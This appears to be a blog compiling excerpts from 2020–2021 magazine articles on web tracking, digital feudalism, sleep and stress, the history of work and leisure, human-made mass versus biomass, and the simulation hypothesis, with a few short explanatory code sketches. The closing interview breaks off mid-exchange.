
Monday, January 4, 2021

Privacy Cost of a “Free” Website

Among them were the marketing and advertising arms of Google, Amazon, and Oracle’s BlueKai consumer data division, which reported a massive data exposure this summer, leaving billions of records—including personally identifiable information—accessible to the open internet without a password.

Zajac was floored when The Markup showed her how many trackers appeared on the site. She said she learned a hard lesson: “If it’s free, that doesn’t mean it’s free. It just means it doesn’t cost money.” Instead, it costs your website visitors’ privacy.  

Website operators may agree to set cookies—small strings of text that identify you—from one outside company. But they are not always aware that the code setting those cookies can also load dozens of other trackers along with them, like nesting dolls, each collecting user data.
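To make the "nesting dolls" concrete, here is a minimal sketch in TypeScript (URLs and the cookie name are hypothetical) of how a single third-party snippet that a site operator pastes in can inject further tracking scripts at runtime, each of which can do the same:

```ts
// Minimal sketch of "nesting doll" tracker loading. The URLs and cookie name
// are hypothetical; the pattern -- one embedded script injecting more scripts
// at runtime -- is what piles dozens of trackers onto a single page.

const PARTNER_SCRIPTS = [
  "https://cdn.analytics.example/pixel.js",   // hypothetical
  "https://tags.adnetwork.example/sync.js",   // hypothetical
  "https://collect.dmp.example/profile.js",   // hypothetical
];

function injectScript(src: string): void {
  const el = document.createElement("script");
  el.src = src;
  el.async = true;
  document.head.appendChild(el); // each injected script may inject still more
}

// The "outer doll": the only tag the website operator knowingly added.
export function initTracker(): void {
  document.cookie = "visitor_id=abc123; path=/"; // the cookie the operator agreed to
  PARTNER_SCRIPTS.forEach(injectScript);         // the nested dolls
}
```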

We scanned more than 80,000 of the world’s most popular websites with Blacklight and found more than 5,000 were “fingerprinting” users, identifying them even if they block third-party cookies.
We also found more than 12,000 websites loaded scripts that watch and record all user interactions on a page—including scrolls and mouse movements. It’s called “session recording” and we found a higher prevalence of it than researchers had documented before.
More than 200 popular websites used a particularly invasive technique that captures personal information people enter on forms—like names, phone numbers, and passwords—before they hit send. It’s called “key logging” and it’s sometimes done as part of session recording.

The use of cookies by websites is well known, and most Americans understand how they work. But even website operators don't always know how trackers end up on their sites: often they arrive through free plug-ins like comments sections, social media sharing buttons, and tools that embed posts from social media—conveniences people have come to expect on the internet but that small website operators don't have the resources to build themselves.

Marketing and advertising companies are happy to provide these tools for free in exchange for user data, which is used to construct ever-more-refined profiles of internet users.

Google Analytics trackers loaded on 69 percent of the 80,000 popular websites scanned with Blacklight. Google Analytics gives website operators insight into how many people visit a website and which pages they view. The catch: Google, the world's largest digital ad seller, also gets the data. The company's cookie policy allows it to connect that data to the advertising profiles it already has on people, but Google spokesperson Elijah Lawal said the company does not do so unless website operators agree.
However, in order for website operators to get information from Google Analytics about the demographics of their visitors, they have to allow data collection by Google’s advertising arm, DoubleClick, which adds the information to user profiles.

The second most common tracker we found on popular sites: Facebook. Blacklight found its pixel on a third of popular sites we scanned. Facebook’s trackers can follow you even if you’re not logged in to Facebook and link your browsing history to your profile for ad targeting. Website operators include the pixel to measure clicks from their ads on Facebook’s platforms.






The Markup

Tuesday, December 29, 2020

In 2029, the Internet Will Make Us Act Like Medieval Peasants

In my own daily life, I already engage constantly with magical forces both sinister and benevolent. I scry through crystal my enemies’ movements from afar. (That is, I hate-follow people on Instagram.) I read stories about cursed symbols so powerful they render incommunicative anyone who gazes upon them. (That is, Unicode glyphs that crash your iPhone.) I refuse to write the names of mythical foes for fear of bidding them to my presence, the way proto-Germanic tribespeople used the euphemistic term brown for “bear” to avoid summoning one. (That is, I intentionally obfuscate words like Gamergate when writing them on Twitter.) I perform superstitious rituals to win the approval of demons. (That is, well, daemons, the autonomous background programs on which modern computing is built.)

This strange dance of ritual and superstition will become only more pronounced over the next decade. Thanks to ubiquitous smartphones and cellular data, the internet has developed into a kind of supernatural layer set atop everyday life, an easily accessible realm of fearsome power, feverish visions, and apocalyptic spiritual battle. The medievalist Richard Wunderli has described the world of 15th-century peasants as “enchanted” — “bounded by a mere translucent, porous barrier that led to the more powerful realm of spirits, devils, angels, and saints,” which doesn’t sound altogether different from a world in which a literally translucent barrier separates me from trolls and daemons and pop-star icons into whose Twitter mentions and Instagram comments I might make quasi-religious pilgrimage.

The structure of the internet is headed toward an arrangement the cybersecurity expert Bruce Schneier calls “digital feudalism,” through which the great landlords, platforms like Google and Facebook, “are becoming our feudal lords, and we are becoming their vassals.” We will provide them with the data-fruits of our browsing, in a nominal exchange for vague assurances of their protection from data-breach marauders. The sense of powerlessness you might already feel in the face of a megaplatform’s opaque algorithmic justice — and the sense of mystery such workings might engender — would not have seemed so strange to a medieval peasant. (Once you explained, you know, what an algorithm is.)

And as the internet bewitches more everyday objects — smart TVs, smart ovens, smart speakers, smart vibrators — its feudal logic will seize the material world as well. You don’t “own” the software on your phone any more than a peasant owned his allotment, and when your car and your front-door lock are similarly enchanted, you can imagine a distant lord easily and arbitrarily evicting you — with the faceless customer-service bots to whom you’d plead your case being as pitiless and unforgiving as a medieval sheriff. The Financial Times’ Izabella Kaminska suggests that, within the “frightfully medieval problem” of the sharing economy’s quasi-feudal control of its contractors, there’s “potential for the return of the guild structure”: Rideshare drivers, for example, might someday create an independent credentialing body to ensure portability of data and reputation across the “borders” of “landholders” (that is, Uber and Lyft), just as craftsmen might have used a guild membership to demonstrate their credentials early in the last millennium.

Where would this feudally arranged, spiritually charged layer of magic take our politics and culture? We could look to our president, who wields power like an absolutist king or a dodgy pope and who speaks, as many observers have noted, like a Greek hero or an Anglo-Saxon warlord — that is, in the braggadocious, highly repetitive style of the epic poetry characteristic of oral cultures.

Paradoxically, the ephemerality — and sheer volume — of text on social media is re-creating the circumstances of a preliterate society: a world in which information is quickly forgotten and nothing can be easily looked up. (Like Irish monks copying out Aristotle, Google and Facebook will collect and sort the world’s knowledge; like the medieval Catholic church, they’ll rigorously control its presentation and accessibility.) Under these conditions, memorability and concision — you know, the same qualities you might say make someone good at Twitter — will be more highly prized than strength of argument, and effective political leaders, for whom the factual truth is less important than the perpetual reinscription of a durable myth, will focus on repetitive self-aggrandizement.






By Max Read
This article appears in the November 11, 2019, issue of New York Magazine

Monday, December 21, 2020

Your Sleep Tonight Changes How You React to Stress Tomorrow

When participants got more sleep, they had higher levels of positive emotions and lower levels of negative emotions the next day. Moreover, sleep impacted how the events of the day affected them. On days when participants had a stressful event, their positive emotions took less of a hit if they’d gotten a good night’s sleep beforehand. And, on days when good things happened, participants experienced an even greater boost in positive emotions if they were well-rested. These benefits were even more pronounced for people who had a greater number of chronic health conditions, such as allergies, high blood pressure, or diabetes.

Sleep has many wide-ranging effects on our lives. For example, past research has found that sleep deprivation is a risk factor for developing chronic health issues. And its impact on positive emotions could partly help explain this, since positive emotions seem to reduce our inflammation and protect our health. In other words, sleep’s effect on our moods could even translate to better or worse health over time.

In addition to health, sleep deprivation can also impact our relationships with others—in two ways, says Nancy Sin, assistant professor at the University of British Columbia and lead author of the paper. First, the irritability you feel when sleep-deprived can harm relationships directly (which might be a reason to postpone serious conversations to a day when you’re more well-rested). Additionally, because positive emotions play a crucial role in building relationships, not experiencing as many positive emotions when you’re sleep-deprived could make it harder to cultivate a sense of closeness with others.

However, the good news is that simple changes to our routines can help improve sleep. Things like keeping a regular schedule, exercising, and limiting unnecessary light and noise in your bedroom can all help promote sleep.

One major recommendation Sin offers is to limit screen time before bed; research suggests that electronics can emit blue light that interferes with sleep. If you often find yourself “doomscrolling” on social media during late-night hours, consider setting a time to turn off screens and switch to a more relaxing activity (like reading or listening to calming music).

For those who live with family or roommates, Sin emphasizes that getting a good night’s sleep isn’t solely an individual effort: The behaviors of those we live with can disrupt our sleep. So, for example, consider making a pact with household members to limit screen time, and holding each other accountable.

The flip side is that improving sleep has the potential to help us cope more effectively with the stresses we’re facing right now. As Sin explains, “Maintaining good sleep is one of these critical aspects of staying healthy emotionally and psychologically during this time.”






Greater Good Magazine

How Civilization Broke Our Brains

Several months ago, I got into a long discussion with a colleague about the origins of the “Sunday scaries,” the flood of anxiety that many of us feel as the weekend is winding down and the workweek approaches. He said that the culprit was clear, and pointed to late-stage capitalism’s corrosive blend of performance stress and job insecurity. But capitalism also exists Monday through Saturday, so why should Sunday be so uniquely anxiety-inducing?

The deeper cause, I thought, might have something to do with the modern psychology of time. Imagine the 21st-century worker as accessing two modes of thinking: productivity mind and leisure mind. When we are under the sway of the former, we are time- and results-optimizing creatures, set on proving our industriousness to the world and, most of all, to ourselves. In leisure mode, the thrumming subsides, allowing us to watch a movie or finish a glass of wine without considering how our behavior might affect our reputation and performance reviews. For several hours a week, on Sunday evening, a psychological tug-of-war between these perspectives takes place. Guilt about recent lethargy kicks in as productivity mind gears up, and apprehension about workaday pressure builds as leisure mind cedes power.

If only we could navigate our divided lives with seamless ease—except what if ease isn’t what most of us really want? In 2012, the University of Maryland sociologist John P. Robinson reviewed more than 40 years of happiness and time-use surveys that asked Americans how often they felt they either were “rushed” or had “excess time.” Perhaps predictably, he concluded that the happiest people were the “never-never” group—those who said they very rarely felt hurried or bored, which isn’t to say they were laid-back. Their schedules met their energy level, and the work they did consumed their attention without exhausting it. In an essay for Scientific American summarizing his research, Robinson offered a strenuous formula for joy: “Happiness means being just rushed enough.”

Despite the headline focus on happiness, Robinson’s most unexpected insights were about American discontent. We may constantly complain about our harried schedules, but the real joy-killer seemed to be the absence of any schedule at all. Considerably less happy than the just-rushed-enough, he said, were those with lots of excess time. He found, as other workplace studies have shown, that Americans are surprisingly fretful when not absorbed by tasks, paid or otherwise. And at the bottom of his rankings, registering an “unparalleled level of unhappiness,” were those whose plight may sound puzzling: people who, though they almost always felt underscheduled, also almost always felt rushed. Such is the psychological misery of an undirected person for whom an urgent need to overcome idleness—to find purpose—becomes a source of stress. This always-always condition struck me as the most peculiarly modern anxiety: It’s the Sunday scaries, all week long.

This bizarre need to feel busy, or to feel that time is structured, even when one is sprawled on the couch on a weekend afternoon—where does it come from? Is it inscribed in our DNA, or is it as much an invention of industrialized culture as paper clips and microchips? To answer that question, we would have to understand the texture of human life for most of our history, before civilization and workweeks edged their way into the picture. We would need a participant-observer from our era to live among hunter-gatherers and experience their relationship to work, time, and joy.

The anthropologist James Suzman has done a version of that, devoting almost 30 years to studying the Ju/’hoansi “Bushmen,” a tribe whose members lived an isolated existence in Namibia and Botswana until the late 20th century, when incursions by local governments destroyed their way of life. In his new book, Work: A Deep History, From the Stone Age to the Age of Robots,* Suzman describes the Ju/’hoansi of yore as healthy and cheerful, perfectly content to work as little as possible and—not coincidentally—ingenious at designing customs that discourage competition and status-seeking. Combining careful anthropological research with excursions into sociology and psychology, he asks how we’ve come to find ourselves more harried—and seemingly more unhappy—than the small-scale communities from which civilization emerged. If there is some better way of handling modernity’s promises and pressures, perhaps the Ju/’hoansi can light the way.

Work, Suzman observes, is what distinguishes animate organisms, humans above all, from inert matter: “Only living things actively seek out and capture energy specifically to live, to grow and to reproduce.” Yet it is the million-year history of labor’s counterpoint, leisure, that holds the key to humanity’s exceptionalism—its record of remarkable progress, and the discontent that seems to have accompanied those strides.

From what we can tell, our Australopithecus ancestors of roughly 2.5 million years ago closely resembled modern primates, such as chimpanzees, who spend about eight hours a day foraging and eating. In between chewing and digesting all that raw pith, stalk, and root, gorillas and chimps sleep nine to 12 hours. Such a routine doesn’t leave much daylight time for leisure activities more energy-intensive than lazy grooming.

Fire changed everything. Anthropologists don’t know precisely how humans first marshaled fire for their use roughly 1 million years ago, but it’s obvious how fire formed humans. By softening meat and vegetables, fire predigests our food, allowing us to eat and retain more calories in less time. By warding off predators, fire allowed our ancestors to climb down from their tree beds and sleep soundly on the ground; more REM sleep sharpened their memory and their focus. Fire also allowed humans to grow huge, energy-greedy brains that gobble up about a fifth of our calories, a far greater proportion than other primates’ brains consume.

By expanding our minds and our free time, fire sparked humankind’s capacity for boredom, amusement, craftsmanship, and art. And from what we can discern, our Homo sapiens ancestors celebrated the gift of free time with gusto.

The Ju/’hoansi spent an average of 17 hours a week finding food—2,140 calories daily—and devoted another 20 to chores, as Suzman gleaned from other ethnographies and firsthand research. This left them with considerably more downtime than the typical full-time employee in the U.S., who spends about 44 hours a week doing work—and that doesn’t include domestic labor and child care. In that downtime, the Ju/’hoansi remained strikingly free, over centuries, from the urge to cram it with activities that we would classify as “productive” (or, for that matter, destructive). By day, they did go on walks with children to teach them how to read the canvas of the desert for the footprints of animals. But they also lounged, gossiped, and flirted. During firelit evenings, they sang, danced, and told stories. One anthropologist studying another hunter-gatherer tribe, the Hadza people of northern Tanzania, described its members in the 1960s as habitual small-stakes gamblers whose days were filled with one particular pastime: winning and losing arrows in games of chance.

So how did we move from that world to a culture in which leisure exists for the sake of work—in which downtime activities (such as using social media) are strewed with performance metrics, and childhood play (such as team sports) has become a résumé enhancer? Suzman does not answer this question in a very organized way. But his discussion highlights at a macro level what the Sunday scaries signal on a personal level: Modern life has made it harder for Americans to forget about their work.

Suzman calls attention to the changing nature of work. He draws on the writing of the French sociologist Émile Durkheim, who pointed to a crucial difference between “primitive” and complex societies called interchangeability. For hunter-gatherers, chiefs and shamans could, and did, moonlight as foragers and hunters. Overlapping duties preserved a strong sense of community, reinforced by customs and religions that obscured individual differences in strength, skill, and ambition. Shared labor meant shared values.

But in industrial economies, lawyers don’t tag in for brain surgery, and drill sergeants don’t harvest wheat—and the different jobs people do, requiring different skill sets, command (often vastly) different pay. As specialization spread and superior performance was rewarded, a cult of competition emerged: High achievers believed they could and should always toil harder for a fatter raise, bigger house, higher honor, or more wondrous breakthrough. Where rest once beckoned, now restlessness did. The productivity mode thrived—and it just might deserve credit (along with luck) for almost all scientific progress and technological ingenuity. But it also bears the blame for what Durkheim called a “malady of infinite aspiration,” which by now we’ve discovered is chronic. When a recent Pew Research Center survey asked about the secret to happiness, most Americans, of all ages, ranked “a job or career they enjoy” above marriage, children, or any other committed relationship. Careerism, not community, is the keystone in the arch of life.

You might say that leisure mind never had a chance. But Suzman emphasizes another fundamental change to help account for that: our relationship to time—specifically, to the future. Small hunter-gatherer groups in tropical climates rarely stored food for more than a few days, Suzman writes. Trusting in the abundance of their environment, the Ju/’hoansi worked to meet their absolute needs, and then stopped to rest, rather than planning ahead.

By comparison, modern civilization is a shrine to the future. The shift goes back to the agricultural revolution, which subjected humans to farming cycles that separated planting and harvest by many months, and continued with the rise of finance. But a fixation on the future by now goes far beyond crop cycles and long-term loans. It is at the heart of our concept of education and corporate development, which presumes that young students and workers will gladly spend decades honing skills that they will be well compensated for only years later. The least controversial values in America today—the importance of grit, the hope for progress, the dream of social mobility—assume that the future is always changing and that our inclination is always to wish for better. Meanwhile, excessively negative future-oriented thinking is the most common feature of anxiety disorders, which afflict almost 20 percent of Americans.

At the aggregate level, high expectations for the future have surely made the world a better place. Despite routine complaining from the 21st century’s inhabitants, modern civilization has produced quite a lot to be thankful for. Slow cookers, Venmo, and internet kittens; vaccines and aspirin, heat lamps and mittens; Amazon, hand soap, air-conditioning—these are a few of my favorite things, at least. But at the individual level, Suzman offers the tantalizing promise that the Ju/’hoansi have something to teach those of us whose brains have been dizzied by the vertigo of civilization.

Even the present-oriented hunter-gatherers, it turns out, had to develop communal strategies to quash the drivers of overwork—status envy, inequality, deprivation. When a Ju/’hoan hunter returned with a big kill, the tribe perceived a danger that he might think his prowess elevated him above others. “We can’t accept this,” one tribesman said. “So we always speak of his meat as worthless. This way we cool his heart and make him gentle.” This practice became known among researchers as “insulting the hunter’s meat.”

It was not the only custom that aimed to discourage a destabilizing competition for status and avoid a concentration of power. The tribe also “insisted that the actual owner of the meat, the individual charged with its distribution, was not the hunter, but the person who owned the arrow that killed the animal,” Suzman writes. By rewarding the semi-random contributor of the arrow, the Ju/’hoansi kept their most talented hunters in check, in order to defend the group’s egalitarianism. A welcome result was that “the elderly, the short-sighted, the clubfooted and the lazy got a chance to be the centre of attention once in a while.”

Reading about these strategies, I felt several things at once—astonished by their ingenuity, mind-blown by the notion of ridiculing exceptional achievements, and worried that my failure to imagine taking comparable pains to protect leisurely harmony meant that my own brain had been addled by too many years in productivity mode, too many twitchy Sunday evenings. But what Suzman’s foray into humanity’s past reveals is that leisure has never been the ready default mode we may imagine, even in the chillest of cultures. The psychological cost of civilization, the scourge of the Sunday scaries, and the lesson of the Ju/’hoansi converge in an insight worth taking to heart: Safeguarding leisure is work. While progress depends on pinning our hopes on a world that doesn’t yet exist, those who cannot stop planning for the future are doomed to labor for a life they will never fully live.






A previous version of this article used an incorrect subtitle for the American edition of James Suzman’s book. The full title of that edition is Work: A Deep History, From the Stone Age to the Age of Robots.

This article appears in the January/February 2021 print edition of The Atlantic

Thursday, December 17, 2020

All the Stuff Humans Make Now Outweighs Earth’s Organisms

When not busy trying to murder humans in The Matrix, the AI program known as Agent Smith took time to pontificate on our nature as a species. You can’t really consider us mammals, he reckoned, because mammals form an equilibrium with their environment. By contrast, humans move to an area and multiply “until every natural resource is consumed,” making us more like a kind of virus. “Human beings are a disease,” he concluded, “a cancer of this planet. You are a plague.”

I think, though, that it would be more accurate to describe humanity as a kind of biofilm: a mat of bacteria or fungi grown as a blanket across the planet, hoovering up its resources. We plop down great cities of concrete and connect them with vast networks of highways. We level forests for timber to build homes. We turn natural materials like sand into cement and glass, and oil into asphalt, and iron into steel. In this reengineering of Earth, we’ve imperiled countless species, many of which will have gone extinct before science ever describes them.

Collectively, these manufactured products of humanity are known as anthropogenic mass. And according to a new paper in the journal Nature, at around 1.1 teratonnes (or 1,100,000,000,000 metric tons), anthropogenic mass now outweighs Earth’s dry biomass. That means all the living organisms, including vegetation, animals, and microbes. More incredible still, at the start of the 20th century, our anthropogenic mass tallied up to only 3 percent of the planet’s biomass but has over the past 100 years grown at an astonishing rate: Annual production now sits at 30 gigatonnes, or 30,000,000,000 metric tons. At this rate, in just 20 more years, anthropogenic mass will go from currently weighing slightly more than total dry biomass to nearly tripling it.
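A rough back-of-the-envelope check of the figures above, sketched in TypeScript. The 1900 biomass is assumed, for simplicity only, to be roughly the same ~1.1 teratonnes as today; the point is just to show how fast a stock must grow to go from about 3 percent of biomass to parity in roughly 120 years.

```ts
// Rough sanity check on the figures quoted above (masses in tonnes).
const anthropogenicMass2020 = 1.1e12; // ~1.1 teratonnes today
const annualProduction = 30e9;        // ~30 gigatonnes produced per year

// Annual output as a share of the existing stock of human-made stuff:
const annualShare = annualProduction / anthropogenicMass2020; // ~0.027, i.e. ~2.7% per year

// In 1900, anthropogenic mass was ~3% of biomass. Assuming biomass of roughly
// 1.1 teratonnes (an assumption for this sketch), that is ~0.033 teratonnes.
// Growing ~33-fold over 120 years implies an average doubling time of:
const growthFactor = 1.1e12 / 0.033e12;
const doublingTimeYears = (120 * Math.log(2)) / Math.log(growthFactor); // ~24 years

console.log({ annualShare, doublingTimeYears: Math.round(doublingTimeYears) });
```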



How on earth did this happen? “It's a combination of both population growth and the rise in consumption and in development,” says environmental scientist Emily Elhacham of Israel’s Weizmann Institute of Science, lead author on the paper. “We see that the majority is construction material.”

Construction materials such as concrete and aggregates like gravel exploded in abundance after World War II, and they make up the vast majority of total anthropogenic mass. (These are global figures.) As the human population has grown, so has its demand for infrastructure like roads. The world has urbanized, too, requiring more materials for buildings. And as more people around the world ascend into the middle class, they splurge on goods, from smartphones to cars. Our plastic—both what’s in use and what we’ve wasted, also taking into account recycling—alone weighs 8 gigatonnes, twice the weight of all the animals on Earth put together.



To quantify all this stuff, the team scoured existing literature, aggregating previously available data sets covering the extraction of resources, industrial production, and waste and recycling. “It turns out that things that humans produce—in our industries, etc.—is something that has been relatively well characterized,” says Weizmann Institute of Science systems biologist Ron Milo, coauthor on the paper.

Quantifying the biomass of all the organisms on Earth was trickier, on account of the planet not keeping good records of exactly how much life is out there. The researchers had to tally everything from giant species like the blue whale all the way down to the microbes that blanket the land and swirl in the oceans. “The biggest uncertainties, actually, in the overall biomass, is in respect mostly to plants, mostly trees,” Milo adds. “It's not easy to estimate the overall mass of roots, shoots, leaves.” But here, too, Milo and his colleagues could pull from previous estimates of biomass up and down the tree of life and incorporate data from satellite monitoring of landscapes to get an idea of how much vegetation is out there.

They also considered the change in biomass over time. For instance, they note that since the first agricultural revolution, humanity has been responsible for cutting plant biomass in half, from 2 teratonnes to one. At the same time—particularly over the past 100 years—people have been creating ever more anthropogenic mass. Not only has production been increasing exponentially, but as that stuff reaches the end of its usefulness it’s simply discarded if it isn’t recyclable.

In other words, all that crap is piling up while humanity continues to obliterate natural biomass, to the point where the mass of each is now about equal. “They produce this, I think, very eye-catching and also strong message that these two types of stocks—the biomass stock and anthropogenic mass—they are actually at a crossover point more or less in 2020, plus or minus a couple of years,” says social ecologist Fridolin Krausmann of the University of Natural Resources and Life Sciences, Vienna, who wasn’t involved in the research but was a peer reviewer for the paper.

The two stocks turn out to be intimately intertwined. The relentless destruction of biomass is largely a consequence of deforestation in pursuit of industrialization and development. But our built environment is also generally awful for wildlife: Highways slice ecosystems in half, birds fly into buildings, sprawling developments fester like scars on the landscape.

The buildup of anthropogenic mass is also linked to the climate crisis. The production of materials is extremely energy-intensive, for one. In the case of cement production, that climate effect comes from powering the manufacturing process and also from the chemical reactions in the forming material that spew carbon dioxide. If the cement industry were a country, according to the climate change website Carbon Brief, it’d be the world’s third most prolific emitter.

As economies the world over continue to grow, humanity has locked itself into a vicious cycle of snowballing the growth of anthropogenic mass. “On the one hand, economic growth drives the accumulation of this mass,” says Krausmann. “And on the other hand, the accumulation of this mass is a major driver of economic development.” China has been a particularly big contributor as of late, Krausmann adds, as the nation has rapidly and massively built up its infrastructure. Which is not to lay the blame on any one country—we’ve made this mess together as a species. And the modeling in the Nature paper was global, not on the scale of individual nations. “But I think it would be interesting to study that in the future, and really see those changes in different regions or in specific countries,” says Elhacham.

What’s abundantly clear at the moment is that anthropogenic mass has grown unchecked and become a nefarious crust over the planet. “This exponential growth of the anthropogenic mass cannot be sustainable,” says Krausmann, “even though we don't know exactly where the threshold might be.”









Wired

Monday, November 30, 2020

Are we living in a computer simulation? I don’t know. Probably.

Are we living in a computer simulation?

The question seems absurd. Yet there are plenty of smart people who are convinced that this is not only possible but perhaps likely.

In an influential paper that laid out the theory, the Oxford philosopher Nick Bostrom showed that at least one of three possibilities is true: 1) All human-like civilizations in the universe go extinct before they develop the technological capacity to create simulated realities; 2) if any civilizations do reach this phase of technological maturity, none of them will bother to run simulations; or 3) advanced civilizations would have the ability to create many, many simulations, and that means there are far more simulated worlds than non-simulated ones.

We can’t know for sure which of these is the case, Bostrom concludes, but they’re all possible — and the third option might even be the most probable outcome. It’s a difficult argument to wrap your head around, but it makes a certain amount of sense.

Rizwan Virk, a computer scientist and video game designer, published a 2019 book, The Simulation Hypothesis, that explores Bostrom’s argument in much greater detail and traces the path from today’s technology to what he calls the “Simulation Point,” the moment at which we could realistically build a Matrix-like simulation.

I know nothing about computer science, but this idea that we’re all characters in an advanced civilization’s video game is, well, kind of awesome. So I reached out to Virk and asked him to break it down for me.

A lightly edited transcript of our conversation follows.


Sean Illing
Pretend I know absolutely nothing about the “simulation hypothesis.” What the hell is the simulation hypothesis?

Rizwan Virk
The simulation hypothesis is the modern equivalent of an idea that’s been around for a while, and it is the idea that the physical world that we live in, including the Earth and the rest of the physical universe, is actually part of a computer simulation.

You can think of it like a high resolution or high-fidelity video game in which we are all characters, and the best way to understand it within Western culture is the movie The Matrix, which many people have seen, or even if they haven’t seen [it], it’s become a cultural phenomenon now beyond the film industry.

In that movie, Keanu Reeves plays the character Neo, who meets a guy named Morpheus, who is aptly named after the Greek god of dreams, and Morpheus gives him a choice of taking the red pill or the blue pill. And if he takes the red pill, he wakes up and realizes that his entire life, including his job, the building he lived in, and everything else, was part of this elaborate video game, and he wakes up in a world outside of the game.

That is the basic version of the simulation hypothesis.

Sean Illing
Are we living in a simulated universe right now?

Rizwan Virk
There are lots of mysteries in physics that are better explained by the simulation hypothesis than by what would be a material hypothesis.

The truth is that there’s much we simply don’t understand about our reality, and I think it’s more likely than not that we are in some kind of a simulated universe. Now, it’s a much more sophisticated video game than the games we produce, just like today World of Warcraft and Fortnite are way more sophisticated than Pac-Man or Space Invaders. They took a couple of decades of figuring out how to model physical objects using 3D models and then how to render them with limited computing power, which eventually led to this spate of shared online video games.

I think there’s a very good chance we are, in fact, living in a simulation, though we can’t say that with 100 percent confidence. But there is plenty of evidence that points in that direction.

Sean Illing
When you say there are aspects of our world that would make more sense if they were part of a simulation, what do you mean exactly?

Rizwan Virk
Well, there are a few different aspects, one of which is this mystery they call quantum indeterminacy, which is the idea that a particle is in one of multiple states and you don’t know that unless you observe the particle.

Probably a better way to understand it is the now-infamous example of Schrödinger’s cat, which is a cat that the physicist Erwin Schrödinger theorized would be in a box with some radioactive material and there was a 50 percent chance the cat is dead and a 50 percent chance the cat is alive.

Now, common sense would tell us that the cat is already either alive or it’s dead. We just don’t know because we haven’t looked in the box. We open the box and it’ll be revealed to us whether the cat is alive or dead. But quantum physics tells us that the cat is both alive and dead at the same time until somebody opens up the box to observe it. The cardinal rule is the universe renders only that which needs to be observed.

Sean Illing
How does Schrödinger’s cat relate to a video game or a computer simulation?

Rizwan Virk
The history of video game development is all about optimizing limited resources. If you asked somebody in the 1980s whether you could render a game like World of Warcraft, which is a full three-dimensional or a virtual reality game, they would say, “No, it would take all the computing power in the world. We couldn’t render all those pixels in real time.”

But what happened over time was that there were optimization techniques. The core of all these optimizations is “only render that which is being observed.”

The first big game to successfully do this was called Doom, which was very popular in the 1990s. It was a first-person shooter game, and it could render only the light rays and objects that were clearly visible from the point of view of the virtual camera. This is an optimization technique, and it’s one of the things that reminds me of a video game in the physical world.
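An illustrative TypeScript sketch of the "only render that which is being observed" idea: objects keep a cheap placeholder, and their expensive detail is computed lazily, only when something actually looks at them. This mirrors the optimization described above; it is not Doom's actual rendering code.

```ts
// Illustrative sketch of "only render that which is being observed": the
// expensive detail of a world object is computed lazily, the first time it
// is actually observed, and skipped entirely for objects nobody can see.

type Detail = { polygons: number[]; texture: string };

class WorldObject {
  private detail: Detail | null = null; // nothing rendered until observed
  constructor(readonly id: string, readonly x: number, readonly y: number) {}

  observe(): Detail {
    if (this.detail === null) {
      // The expensive work happens here, and only here.
      this.detail = { polygons: new Array(1000).fill(0), texture: `tex_${this.id}` };
    }
    return this.detail;
  }
}

// A render pass touches only the objects inside the camera's field of view.
function renderFrame(objects: WorldObject[], isVisible: (o: WorldObject) => boolean): number {
  return objects.filter(isVisible).map((o) => o.observe()).length;
}

const world = [new WorldObject("door", 1, 2), new WorldObject("monster", 40, 90)];
renderFrame(world, (o) => o.x < 10 && o.y < 10); // only "door" ever gets rendered
```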

Sean Illing
I’m going to do the thing that non-scientists always do when they want to sound scientific and invoke Occam’s razor. Isn’t the hypothesis that we’re living in a flesh-and-blood physical world the simpler — and therefore more likely — explanation?

Rizwan Virk
I’ll bring up a very famous physicist, John Wheeler. He was one of the last physicists who worked with Albert Einstein and many of the great physicists of the 20th century. He said that physics was initially thought to be about the study of physical objects, that everything was reducible to particles. This is what’s often called the Newtonian model. But then we discovered quantum physics and we realized that everything was a field of probabilities and it wasn’t actually physical objects. That was the second wave in Wheeler’s career.

The third wave in his career was the discovery that at the core level, everything is information, everything is based on bits. So Wheeler came up with a famous phrase called “it from bit,” which is the idea that anything we see as physical is really the result of bits of information. He didn’t live to see quantum computers come into reality, but it’s looking more like that.

So I would say that if the world isn’t really physical, if it’s based on information, then a simpler explanation might in fact be that we are in a simulation that is generated based on computer science and information.

Sean Illing
Is there any way, in principle, for us to prove definitively that we’re living in a simulation?

Rizwan Virk
Well, there’s an argument the Oxford philosopher Nick Bostrom has made that’s worth repeating. He says that if even one civilization got to the point of creating one of these high-fidelity simulations, then they can create literally billions of civilizations that are simulated, each with trillions of beings, because all you need is more computing power.

So he’s making a statistical argument that there are more likely to be more simulated beings than there are biological ones, just because it’s so quick and easy to create them. Therefore, if we are conscious beings, we are more likely to be a simulated being than a biological one. That’s more of a philosophical argument.
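For readers who want the compact version, Bostrom's paper expresses this statistical claim as a simple fraction (notation lightly adapted here): write $f_p$ for the fraction of civilizations that reach the simulation-building stage, $f_I$ for the fraction of those that choose to run ancestor simulations, and $\bar{N}$ for the average number of simulated populations each such civilization creates. The share of observers who are simulated is then

$$ f_{\text{sim}} = \frac{f_p \, f_I \, \bar{N}}{f_p \, f_I \, \bar{N} + 1}, $$

which approaches 1 as soon as $f_p f_I \bar{N}$ is large, and is small only if $f_p$ or $f_I$ is close to zero; those two cases correspond to the first two possibilities in the trilemma quoted earlier.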

Sean Illing
If we were living in a computer program, I assume that program would consist of rules and that those rules could be broken or suspended by the people or beings who programmed the simulation. But the laws of our physical world seem to be pretty constant, so isn’t that a sign that this might not be a simulation?

Rizwan Virk
Computers do follow rules, but the fact that the rules always apply doesn’t rule in or rule out that we could be part of a computer simulation. One of the concepts that ties into this is a concept called computational irreducibility, and it’s the idea that in order to figure something out, you can’t just calculate it in an equation; you have to actually go through the steps to figure out what the end result would be.

And this is part of a branch of mathematics called chaos theory. There’s the old idea that the butterfly flaps its wings in China and it results in a hurricane somewhere else in the world. To figure that out, you have to actually go through and model every step of the way. Just because the rules seem to apply doesn’t mean that we’re not in a simulation.

In fact, it could be more evidence that we’re in a simulation.
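A standard concrete example of computational irreducibility (our illustration, not one Virk gives in the interview) is Stephen Wolfram's Rule 30 cellular automaton: no known shortcut predicts row n without actually computing all n rows. A minimal TypeScript sketch:

```ts
// Rule 30 cellular automaton: a textbook case of computational irreducibility.
// To know what row n looks like, you have to actually compute all n rows.

function rule30Step(cells: number[]): number[] {
  return cells.map((_, i) => {
    const left = cells[(i - 1 + cells.length) % cells.length];
    const center = cells[i];
    const right = cells[(i + 1) % cells.length];
    return left ^ (center | right); // Rule 30: new cell = left XOR (center OR right)
  });
}

let row: number[] = new Array(64).fill(0);
row[32] = 1; // start from a single live cell
for (let step = 0; step < 16; step++) {
  console.log(row.map((c) => (c ? "#" : ".")).join(""));
  row = rule30Step(row);
}
```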

Sean Illing
